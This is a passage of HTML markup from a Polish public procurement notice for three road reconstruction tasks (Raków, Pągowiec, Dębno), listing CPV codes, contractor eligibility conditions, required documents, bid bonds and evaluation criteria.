stalowych dla znaków drogowych wraz z wykonaniem wykopu, fundamentu i zasypaniem dołów z ubiciem warstwami,- Tablice znaków drogowych kat. A i D mocowane do słupków stalowych</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233290-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-06-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zamawiający wymaga zatrudnienia przez wykonawcę lub [podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974r. - Kodeks pracy (Dz. U. z 2014r. poz. 1502, z późn. zm.). Zamawiający wymaga zatrudnienia na podstawie umowy o pracę wykonawcę lub podwykonawcę pracowników fizycznych w trakcie realizacji zamówienia. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa żadnych warunków w tym zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa żadnych warunków w tym zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a) Wykonawca spełni warunek jeżeli wykaże odpowiednie doświadczenie zawodowe. Wykonawca musi wykazać, że wykonał (zakończył) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadanie w zakresie budowy, rozbudowy, przebudowy lub remontu drogi o wartości nie mniejszej niż 500.000,00 zł. brutto - na załączniku nr 7. Warunek ten nie podlega zsumowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że przynajmniej jeden z nich spełnia w/w warunek.b) Wykonawca spełni warunek jeżeli wykaże odpowiedni potencjał kadrowy. Wykonawca musi wykazać, że dysponuje lub będzie dysponować, w okresie przewidzianym na realizację zamówienia osobą legitymującą się kwalifikacjami zawodowymi, uprawnieniami, doświadczeniem i wykształceniem odpowiednimi do funkcji objęcia stanowiska kierownika budowy. Osoba przeznaczona na to stanowisko musi posiadać: - uprawnienia budowlane do kierowania robotami w specjalności drogowej, potwierdzone stosownymi decyzjami, o których mowa w Ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2013 r., poz. 1409 ze zm.), - co najmniej 2 letnie doświadczenie od uzyskania uprawnień, w tym pracę na stanowisku kierownika budowy lub kierownika robót na zadaniu obejmującym budowę, rozbudowę, przebudowę lub remont drogi. Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane (t.j. Dz. U. z 2013 r., poz. 1409) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., Nr 63, poz. 65). Osoba o której mowa wyżej winna posiadać biegłą znajomość języka polskiego. Zamawiający dopuszcza zmianę tego wymogu wyłącznie w przypadku, gdy: wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym, a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego - na załączniku nr 8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1/ zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. /Wymagana forma dokumentu - oryginał lub kopia potwierdzona za zgodność z oryginałem przez wykonawcę/.2/ zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. /Wymagana forma dokumentu - oryginał lub kopia potwierdzona za zgodność z oryginałem przez wykonawcę/. 3/ odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy. /Wymagana forma dokumentu - oryginał lub kopia potwierdzona za zgodność z oryginałem przez wykonawcę/.4/ oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716); /Wymagana forma dokumentu - oryginał/.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1/ Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone - na załączniku nr 7. Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; Wykaz musi potwierdzać spełnienie warunku o którym mowa w pkt 6.1.2. a). /Wymagana forma dokumentów: a) wykaz robót budowlanych - oryginał na załączonym formularzu, b) dowody - oryginał lub kopia poświadczona za zgodność z oryginałem/.2/ Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - na załączniku nr 8. Wykaz musi potwierdzać spełnienie warunku o którym mowa w pkt 6.1.2. b) /Wymagana forma dokumentu - oryginał/. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 8.6.3 ppkt 1/ - 3/ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, b) nie otwarto jego likwidacji ani nie ogłoszono upadłości. 1)Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy (ewentualnie umowę o współdziałaniu z której będzie wynikać przedmiotowe pełnomocnictwo), wprzypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy); 2) Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestracyjnych przedłożone w oryginale lub kopii potwierdzonej notarialnie. 3) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości:Zadanie nr 1 - Przebudowa ul. Klasztornej w Rakowie - 15 000,00 zł. (słownie: piętnaście tysięcy 00/100 zł.)Zadanie nr 2	- Przebudowa drogi w Pągowcu - 7.000,00 zł (słownie: siedem tysięcy zł 00/100)Zadanie nr 3	- Przebudowa drogi w miejscowości Dębno - 20.000,00 zł (słownie: dwadzieścia tysięcy zł 00/100) </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> 